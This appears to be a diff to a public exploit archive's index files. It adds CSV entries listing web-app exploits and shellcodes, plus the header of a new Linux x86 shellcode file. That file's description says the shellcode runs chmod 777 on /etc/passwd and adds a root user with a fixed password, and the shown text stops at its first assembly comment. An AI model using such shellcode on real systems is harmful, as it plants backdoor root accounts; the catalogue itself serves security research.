47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution",2019-07-26,"Wietse Boonstra",webapps,jsp,
47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",2019-07-26,"Wietse Boonstra",webapps,jsp,443
@ -42192,6 +42213,7 @@ id,file,description,date,author,type,platform,port
47293,exploits/linux/webapps/47293.sh,"Webmin 1.920 - Remote Code Execution",2019-08-19,"Fernando A. Lagos B",webapps,linux,
47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80
47295,exploits/php/webapps/47295.html,"WordPress Plugin Add Mime Types 2.2.1 - Cross-Site Request Forgery",2019-08-20,"Princy Edward",webapps,php,
47299,exploits/php/webapps/47299.php,"Nagios XI 5.6.5 - Remote Code Execution / Root Privilege Escalation",2019-08-21,"Jak Gibb",webapps,php,
47301,exploits/multiple/webapps/47301.txt,"Nimble Streamer 3.0.2-2 < 3.5.4-9 - Directory Traversal",2019-08-23,MaYaSeVeN,webapps,multiple,
47302,exploits/windows/webapps/47302.txt,"LSoft ListServ < 16.5-2018a - Cross-Site Scripting",2019-08-26,MTK,webapps,windows,
47303,exploits/php/webapps/47303.txt,"WordPress Plugin Import Export WordPress Users 1.3.1 - CSV Injection",2019-08-26,"Javier Olmedo",webapps,php,80
@ -42208,16 +42230,19 @@ id,file,description,date,author,type,platform,port
47325,exploits/php/webapps/47325.txt,"DomainMod 4.13 - Cross-Site Scripting",2019-08-30,"Damian Ebelties",webapps,php,
47326,exploits/php/webapps/47326.txt,"YouPHPTube 7.4 - Remote Code Execution",2019-08-30,"Damian Ebelties",webapps,php,80
47327,exploits/php/webapps/47327.txt,"WordPress Plugin WooCommerce Product Feed 2.2.18 - Cross-Site Scripting",2019-08-30,"Damian Ebelties",webapps,php,80
47330,exploits/linux/webapps/47330.rb,"Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)",2019-09-02,"James Bercegay",webapps,linux,
47331,exploits/php/webapps/47331.txt,"Opencart 3.x - Cross-Site Scripting",2019-09-02,"Nipun Somani",webapps,php,
47335,exploits/php/webapps/47335.txt,"WordPress Plugin Event Tickets 4.10.7.1 - CSV Injection",2019-09-02,MTK,webapps,php,
47338,exploits/multiple/webapps/47338.txt,"Alkacon OpenCMS 10.5.x - Cross-Site Scripting",2019-09-02,Aetsu,webapps,multiple,
47339,exploits/multiple/webapps/47339.txt,"Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2)",2019-09-02,Aetsu,webapps,multiple,
47340,exploits/multiple/webapps/47340.txt,"Alkacon OpenCMS 10.5.x - Local File inclusion",2019-09-02,Aetsu,webapps,multiple,
47342,exploits/multiple/webapps/47342.html,"Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery",2019-09-02,"Bhadresh Patel",webapps,multiple,
47343,exploits/php/webapps/47343.txt,"Craft CMS 2.7.9/3.2.5 - Information Disclosure",2019-09-02,"Mohammed Abdul Raheem",webapps,php,
47349,exploits/php/webapps/47349.txt,"FileThingie 2.5.7 - Arbitrary File Upload",2019-09-03,cakes,webapps,php,
47350,exploits/php/webapps/47350.txt,"WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting",2019-09-04,MgThuraMoeMyint,webapps,php,80
47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80
47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php,
47359,exploits/php/webapps/47359.txt,"Publisure Hybrid - Multiple Vulnerabilities",2019-09-06,"Jean-Marie Bourbon",webapps,php,
47361,exploits/php/webapps/47361.pl,"WordPress Core 5.2.3 - Cross-Site Host Modification",2019-09-09,"Todor Donev",webapps,php,
47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,80
47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,xerubus,webapps,multiple,
@ -42237,6 +42262,7 @@ id,file,description,date,author,type,platform,port
47386,exploits/php/webapps/47386.txt,"LimeSurvey 3.17.13 - Cross-Site Scripting",2019-09-13,"SEC Consult",webapps,php,80
47387,exploits/php/webapps/47387.txt,"Ticket-Booking 1.4 - Authentication Bypass",2019-09-14,cakes,webapps,php,
47388,exploits/php/webapps/47388.txt,"College-Management-System 1.2 - Authentication Bypass",2019-09-14,cakes,webapps,php,
47391,exploits/jsp/webapps/47391.go,"NetGain EM Plus 10.1.68 - Remote Command Execution",2019-09-16,azams,webapps,jsp,
47392,exploits/cfm/webapps/47392.txt,"Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload",2019-09-16,"Pankaj Kumar Thakur",webapps,cfm,
47395,exploits/php/webapps/47395.txt,"CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection",2019-09-16,cakes,webapps,php,
47398,exploits/php/webapps/47398.txt,"Hospital-Management 1.26 - 'fname' SQL Injection",2019-09-18,cakes,webapps,php,
@ -42245,6 +42271,7 @@ id,file,description,date,author,type,platform,port
47402,exploits/php/webapps/47402.txt,"GOautodial 4.0 - 'CreateEvent' Persistent Cross-Site Scripting",2019-09-19,cakes,webapps,php,
47403,exploits/php/webapps/47403.html,"LayerBB < 1.1.4 - Cross-Site Request Forgery",2019-09-20,0xB9,webapps,php,
47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,
47413,exploits/php/webapps/47413.py,"Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection",2019-09-24,"Nassim Asrir",webapps,php,
47417,exploits/aspx/webapps/47417.txt,"Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistant Cross-Site Scripting",2019-09-25,"Davide Cioccia",webapps,aspx,
47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,
47420,exploits/json/webapps/47420.txt,"NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution",2019-09-25,"Semen Alexandrovich Lyhin",webapps,json,
@ -42266,9 +42293,11 @@ id,file,description,date,author,type,platform,port
47438,exploits/php/webapps/47438.txt,"phpIPAM 1.4 - SQL Injection",2019-09-30,"Kevin Kirsche",webapps,php,80
47440,exploits/python/webapps/47440.txt,"thesystem 1.0 - Cross-Site Scripting",2019-09-30,"Anıl Baran Yelken",webapps,python,
47441,exploits/python/webapps/47441.txt,"TheSystem 1.0 - Command Injection",2019-09-30,"Sadik Cetin",webapps,python,
47443,exploits/php/webapps/47443.rb,"WordPress Plugin ARforms 3.7.1 - Arbitrary File Deletion",2019-09-30,"Ahmad Almorabea",webapps,php,
47446,exploits/multiple/webapps/47446.php,"PHP 7.1 < 7.3 - 'json serializer' disable_functions Bypass",2019-09-28,mm0r1,webapps,multiple,
47447,exploits/php/webapps/47447.py,"vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution",2019-09-23,anonymous,webapps,php,
47448,exploits/multiple/webapps/47448.py,"DotNetNuke < 9.4.0 - Cross-Site Scripting",2019-10-01,MaYaSeVeN,webapps,multiple,80
47449,exploits/multiple/webapps/47449.txt,"DotNetNuke 9.3.2 - Cross-Site Scripting",2019-10-01,"Semen Alexandrovich Lyhin",webapps,multiple,
47455,exploits/php/webapps/47455.php,"Detrix EDMS 1.2.3.1505 - SQL Injection",2019-10-02,"Burov Konstantin",webapps,php,80
47457,exploits/linux/webapps/47457.py,"mintinstall 7.9.9 - Code Execution",2019-10-03,"İbrahim Hakan Şeker",webapps,linux,
47459,exploits/multiple/webapps/47459.py,"AnchorCMS < 0.12.3a - Information Disclosure",2019-10-03,"Tijme Gommers",webapps,multiple,
@ -42517,6 +42546,7 @@ id,file,description,date,author,type,platform,port
48019,exploits/java/webapps/48019.py,"Cisco Data Center Network Manager 11.2.1 - 'getVmHostData' SQL Injection",2020-02-06,mr_me,webapps,java,
48020,exploits/java/webapps/48020.py,"Cisco Data Center Network Manager 11.2.1 - 'LanFabricImpl' Command Injection",2020-02-06,mr_me,webapps,java,
48022,exploits/php/webapps/48022.txt,"QuickDate 1.3.2 - SQL Injection",2020-02-07,"Ihsan Sencan",webapps,php,
48023,exploits/php/webapps/48023.txt,"VehicleWorkshop 1.0 - 'bookingid' SQL Injection",2020-02-07,"Mehran Feizi",webapps,php,
48024,exploits/php/webapps/48024.txt,"PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection",2020-02-07,"Amel BOUZIANE-LEBLOND",webapps,php,
48025,exploits/php/webapps/48025.txt,"EyesOfNetwork 5.3 - Remote Code Execution",2020-02-07,"Clément Billac",webapps,php,
48026,exploits/xml/webapps/48026.txt,"ExpertGPS 6.38 - XML External Entity Injection",2020-02-07,"Trent Gordon",webapps,xml,
@ -42526,16 +42556,23 @@ id,file,description,date,author,type,platform,port
48040,exploits/cgi/webapps/48040.txt,"CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting",2020-02-11,Luca.Chiou,webapps,cgi,
48042,exploits/php/webapps/48042.txt,"Vanilla Forums 2.6.3 - Persistent Cross-Site Scripting",2020-02-11,"Sayak Naskar",webapps,php,
48047,exploits/php/webapps/48047.rb,"WordPress Plugin InfiniteWP - Client Authentication Bypass (Metasploit)",2020-02-11,Metasploit,webapps,php,80
48058,exploits/php/webapps/48058.txt,"WordPress Plugin Tutor.1.5.3 - Local File Inclusion",2020-02-13,"Mehran Feizi",webapps,php,
48059,exploits/php/webapps/48059.txt,"WordPress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting",2020-02-13,"Mehran Feizi",webapps,php,
48061,exploits/php/webapps/48061.txt,"WordPress Plugin Wordfence.7.4.5 - Local File Disclosure",2020-02-13,"Mehran Feizi",webapps,php,
48062,exploits/php/webapps/48062.txt,"WordPress Plugin contact-form-7 5.1.6 - Remote File Upload",2020-02-13,"Mehran Feizi",webapps,php,
48066,exploits/php/webapps/48066.txt,"phpMyChat Plus 1.98 - 'pmc_username' SQL Injection",2020-02-14,J3rryBl4nks,webapps,php,
48064,exploits/php/webapps/48064.py,"PANDORAFMS 7.0 - Authenticated Remote Code Execution",2020-02-13,"Engin Demirbilek",webapps,php,
48065,exploits/php/webapps/48065.txt,"WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion",2020-02-13,"Mehran Feizi",webapps,php,
48074,exploits/php/webapps/48074.txt,"SOPlanning 1.45 - 'by' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,
48076,exploits/php/webapps/48076.txt,"WordPress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting",2020-02-17,"Jinson Varghese Behanan",webapps,php,
48077,exploits/hardware/webapps/48077.txt,"Avaya Aura Communication Manager 5.2 - Remote Code Execution",2020-02-17,"Sarang Tumne",webapps,hardware,
48082,exploits/php/webapps/48082.txt,"Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
48083,exploits/php/webapps/48083.txt,"WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting",2020-02-17,"Ultra Security Team",webapps,php,
48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,
48088,exploits/php/webapps/48088.txt,"WordPress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting",2020-02-17,Shahab.ra.9,webapps,php,
48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,
48090,exploits/java/webapps/48090.py,"LabVantage 8.3 - Information Disclosure",2020-02-17,"Joel Aviad Ossi",webapps,java,
48093,exploits/php/webapps/48093.txt,"WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting",2020-02-18,"Ultra Security Team",webapps,php,
48094,exploits/php/webapps/48094.py,"Virtual Freer 1.58 - Remote Command Execution",2020-02-19,SajjadBnd,webapps,php,
48095,exploits/hardware/webapps/48095.pl,"DBPower C300 HD Camera - Remote Configuration Disclosure",2020-02-19,"Todor Donev",webapps,hardware,
48098,exploits/hardware/webapps/48098.py,"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak",2020-02-19,byteGoblin,webapps,hardware,
@ -42585,6 +42622,9 @@ id,file,description,date,author,type,platform,port
48189,exploits/php/webapps/48189.txt,"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting",2020-03-10,En_dust,webapps,php,
48190,exploits/php/webapps/48190.txt,"Persian VIP Download Script 1.0 - 'active' SQL Injection",2020-03-10,S3FFR,webapps,php,
48197,exploits/php/webapps/48197.txt,"WordPress Plugin Search Meter 2.13.2 - CSV injection",2020-03-11,"Daniel Monzón",webapps,php,
48198,exploits/php/webapps/48198.txt,"Joomla! 3.9.0 < 3.9.7 - CSV Injection",2020-03-11,i4bdullah,webapps,php,
48199,exploits/php/webapps/48199.txt,"PlaySMS 1.4.3 - Template Injection / Remote Code Execution",2020-03-11,"Touhid M.Shaikh",webapps,php,
48200,exploits/php/webapps/48200.txt,"Wing FTP Server - Authenticated CSRF (Delete Admin)",2020-03-11,"Dhiraj Mishra",webapps,php,
48202,exploits/php/webapps/48202.txt,"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection",2020-03-12,"Milad karimi",webapps,php,
48203,exploits/java/webapps/48203.txt,"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure",2020-03-12,"RedTeam Pentesting GmbH",webapps,java,
48204,exploits/php/webapps/48204.txt,"WordPress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection",2020-03-12,"Daniel Monzón",webapps,php,
@ -42594,14 +42634,18 @@ id,file,description,date,author,type,platform,port
48209,exploits/php/webapps/48209.py,"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion",2020-03-11,"Andrea Cardaci",webapps,php,
48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php,
48212,exploits/linux/webapps/48212.txt,"Centos WebPanel 7 - 'term' SQL Injection",2020-03-13,"Berke YILMAZ",webapps,linux,
48213,exploits/php/webapps/48213.txt,"WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification",2020-03-13,"Nawaf Alkeraithe",webapps,php,
48215,exploits/php/webapps/48215.sh,"Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution",2020-03-10,"Andrea Cardaci",webapps,php,
48217,exploits/asp/webapps/48217.txt,"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)",2020-03-16,"Miguel Mendez Z",webapps,asp,
48218,exploits/php/webapps/48218.txt,"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection",2020-03-16,"AYADI Mohamed",webapps,php,
48219,exploits/php/webapps/48219.py,"PHPKB Multi-Language 9 - Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php,
48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
48222,exploits/php/webapps/48222.txt,"UADMIN Botnet 1.0 - 'link' SQL Injection",2020-03-17,n4pst3r,webapps,php,
48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware,
48230,exploits/php/webapps/48230.txt,"Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload",2020-03-18,qw3rTyTy,webapps,php,
48234,exploits/php/webapps/48234.txt,"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)",2020-03-20,"Metin Yunus Kandemir",webapps,php,
48238,exploits/php/webapps/48238.txt,"Wordpress Plugin PicUploader 1.0 - Remote File Upload",2020-03-23,"Milad karimi",webapps,php,
48240,exploits/multiple/webapps/48240.txt,"FIBARO System Home Center 5.021 - Remote File Include",2020-03-23,LiquidWorm,webapps,multiple,
48241,exploits/php/webapps/48241.py,"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection",2020-03-23,"Matthew Aberegg",webapps,php,
48242,exploits/php/webapps/48242.txt,"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection",2020-03-23,qw3rTyTy,webapps,php,
@ -42618,6 +42662,7 @@ id,file,description,date,author,type,platform,port
48266,exploits/cgi/webapps/48266.py,"Zen Load Balancer 3.10.1 - Remote Code Execution",2020-03-30,"Cody Sixteen",webapps,cgi,
48270,exploits/hardware/webapps/48270.py,"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
48271,exploits/hardware/webapps/48271.py,"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
48278,exploits/php/webapps/48278.txt,"PHP-Fusion 9.03.50 - 'panels.php' Remote Code Execution",2020-04-02,Unkn0wn,webapps,php,
48280,exploits/php/webapps/48280.py,"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution",2020-04-03,"Basim Alabdullah",webapps,php,
48289,exploits/php/webapps/48289.txt,"LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,php,
48294,exploits/multiple/webapps/48294.rb,"Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)",2020-04-06,"Mehmet Ince",webapps,multiple,
@ -42626,6 +42671,7 @@ id,file,description,date,author,type,platform,port
48297,exploits/php/webapps/48297.txt,"LimeSurvey 4.1.11 - 'File Manager' Path Traversal",2020-04-06,"Matthew Aberegg",webapps,php,
48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd,
48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php,
48307,exploits/php/webapps/48307.txt,"WordPress Plugin Helpful 2.4.11 - SQL Injection",2020-04-10,"numan türle",webapps,php,
48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,
48310,exploits/hardware/webapps/48310.txt,"Huawei HG630 2 Router - Authentication Bypass",2020-04-13,"Eslam Medhat",webapps,hardware,
48311,exploits/hardware/webapps/48311.py,"TVT NVMS 1000 - Directory Traversal",2020-04-13,"Mohin Paramasivam",webapps,hardware,
@ -42647,7 +42693,9 @@ id,file,description,date,author,type,platform,port
48340,exploits/ios/webapps/48340.txt,"Playable 9.18 iOS - Persistent Cross-Site Scripting",2020-04-17,Vulnerability-Lab,webapps,ios,
48341,exploits/php/webapps/48341.txt,"TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection",2020-04-17,Vulnerability-Lab,webapps,php,
48345,exploits/php/webapps/48345.txt,"Centreon 19.10.5 - 'id' SQL Injection",2020-04-20,"Basim Alabdullah",webapps,php,
48347,exploits/php/webapps/48347.txt,"Prestashop 1.7.6.4 - Cross-Site Request Forgery",2020-04-20,"Sivanesh Ashok",webapps,php,
48348,exploits/php/webapps/48348.txt,"Fork CMS 5.8.0 - Persistent Cross-Site Scripting",2020-04-20,Vulnerability-Lab,webapps,php,
48349,exploits/php/webapps/48349.py,"WordPress Plugin Simple File List 5.4 - Remote Code Execution",2020-04-20,coiffeur,webapps,php,
48354,exploits/php/webapps/48354.txt,"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting",2020-04-21,"Metin Yunus Kandemir",webapps,php,
48356,exploits/php/webapps/48356.txt,"PMB 5.6 - 'logid' SQL Injection",2020-04-21,41-trk,webapps,php,
48357,exploits/php/webapps/48357.txt,"CSZ CMS 1.2.7 - 'title' HTML Injection",2020-04-21,"Metin Yunus Kandemir",webapps,php,
@ -42663,6 +42711,7 @@ id,file,description,date,author,type,platform,port
48371,exploits/php/webapps/48371.txt,"Complaint Management System 4.2 - Authentication Bypass",2020-04-23,Besim,webapps,php,
48372,exploits/php/webapps/48372.txt,"Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)",2020-04-23,Besim,webapps,php,
48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi,
48374,exploits/php/webapps/48374.txt,"Library CMS Powerful Book Management System 2.2.0 - Session Fixation",2020-04-23,"Ismail Tasdelen",webapps,php,
48375,exploits/ios/webapps/48375.txt,"Sky File 2.1.0 iOS - Directory Traversal",2020-04-23,Vulnerability-Lab,webapps,ios,
48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple,
48377,exploits/hardware/webapps/48377.txt,"Edimax EW-7438RPn 1.13 - Remote Code Execution",2020-04-24,Besim,webapps,hardware,
@ -42805,7 +42854,7 @@ id,file,description,date,author,type,platform,port
48567,exploits/php/webapps/48567.txt,"Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection",2020-06-09,"Kostadin Tonev",webapps,php,
48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,
48571,exploits/php/webapps/48571.txt,"Sistem Informasi Pengumuman Kelulusan Online 1.0 - Cross-Site Request Forgery (Add Admin)",2020-06-10,Extinction,webapps,php,
48572,exploits/php/webapps/48572.txt,"Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)",2020-06-10,"Mehmet Kelepçe",webapps,php,
48572,exploits/php/webapps/48572.txt,"Joomla! J2 Store 3.3.11 - 'filter_order_Dir' Authenticated SQL Injection",2020-06-10,"Mehmet Kelepçe",webapps,php,
48574,exploits/php/webapps/48574.txt,"Virtual Airlines Manager 2.6.2 - 'id' SQL Injection",2020-06-10,Mosaaed,webapps,php,
48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,
48581,exploits/multiple/webapps/48581.txt,"Avaya IP Office 11 - Password Disclosure",2020-06-12,hyp3rlinx,webapps,multiple,
@ -42814,3 +42863,4 @@ id,file,description,date,author,type,platform,port
48590,exploits/php/webapps/48590.py,"Gila CMS 1.11.8 - 'query' SQL Injection",2020-06-16,BillyV4,webapps,php,
48593,exploits/php/webapps/48593.txt,"College-Management-System-Php 1.0 - Authentication Bypass",2020-06-17,"BLAY ABU SAFIAN",webapps,php,
48595,exploits/multiple/webapps/48595.txt,"OpenCTI 3.3.1 - Directory Traversal",2020-06-17,"Raif Berkay Dincel",webapps,multiple,
48605,exploits/php/webapps/48605.txt,"Beauty Parlour Management System 1.0 - Authentication Bypass",2020-06-18,"Prof. Kailas PATIL",webapps,php,

Can't render this file because it is too large.

5
files_shellcodes.csv
View file

@ -1004,6 +1004,7 @@ id,file,description,date,author,type,platform
47396,shellcodes/linux_x86/47396.c,"Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)",2019-09-17,"Daniel Ortiz",shellcode,linux_x86
47461,shellcodes/linux_x86/47461.c,"Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)",2019-10-04,bolonobolo,shellcode,linux_x86
47473,shellcodes/arm/47473.c,"Linux/ARM - Fork Bomb Shellcode (20 bytes)",2019-10-08,CJHackerz,shellcode,arm
47481,shellcodes/linux/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux
47511,shellcodes/linux/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux
47513,shellcodes/linux/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux
47514,shellcodes/linux/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux
@ -1018,8 +1019,8 @@ id,file,description,date,author,type,platform
48116,shellcodes/windows_x86/48116.c,"Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86
48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows
48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux
48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64
48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64
48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows
48379,shellcodes/linux/48379.c,"Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux
48379,shellcodes/linux/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux
48585,shellcodes/arm/48585.c,"Linux/ARM - execve /bin/dash Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm

1 id file description date author type platform
1004 47396 shellcodes/linux_x86/47396.c Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes) 2019-09-17 Daniel Ortiz shellcode linux_x86
1005 47461 shellcodes/linux_x86/47461.c Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes) 2019-10-04 bolonobolo shellcode linux_x86
1006 47473 shellcodes/arm/47473.c Linux/ARM - Fork Bomb Shellcode (20 bytes) 2019-10-08 CJHackerz shellcode arm
1007 47481 shellcodes/linux/47481.c Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) 2019-10-10 VL43CK shellcode linux
1008 47511 shellcodes/linux/47511.c Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) 2019-10-16 bolonobolo shellcode linux
1009 47513 shellcodes/linux/47513.c Linux/x86 - execve /bin/sh Shellcode (25 bytes) 2019-10-16 bolonobolo shellcode linux
1010 47514 shellcodes/linux/47514.c Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes) 2019-10-16 bolonobolo shellcode linux
1019 48116 shellcodes/windows_x86/48116.c Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes) 2020-02-24 boku shellcode windows_x86
1020 48229 shellcodes/windows/48229.txt Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) 2020-03-18 boku shellcode windows
1021 48243 shellcodes/linux/48243.txt Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes) 2020-03-23 Upayan shellcode linux
1022 48252 shellcodes/windows_x86-64/48252.txt Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes) 2020-03-25 boku shellcode windows_x86-64
1023 48355 shellcodes/windows/48355.c Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) 2020-04-21 boku shellcode windows
1024 48379 shellcodes/linux/48379.c Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes) 2020-04-24 boku shellcode linux
1025 48585 shellcodes/arm/48585.c Linux/ARM - execve /bin/dash Shellcode (32 bytes) 2020-06-15 Anurag Srivastava shellcode arm
1026 48586 shellcodes/arm/48586.c Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes) 2020-06-15 Anurag Srivastava shellcode arm

105
shellcodes/linux/47481.c Normal file
View file

@ -0,0 +1,105 @@
# Exploit Title: Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)
# Date: 2019-10-05
# Exploit Author: sagar.offsec (VL43CK)
# Guided by: Touhid M.Shaikh
# Designation: Security Consultant at SecureLayer7
# Website: https://www.sagaroffsec.com
# Tested on: Ubuntu i386 GNU/LINUX
# Shellcode Length: 59
----------------------(DESCRIPTION)----------------------------
This shellcode will first change /etc/passwd permission to 777 and then
add a user "vl43ck" in it with password "test" with root permissions.
----------------------(SHELLCODE DUMP)-------------------------
global _start
section .text
_start:
;chmod 777 /etc/passwd
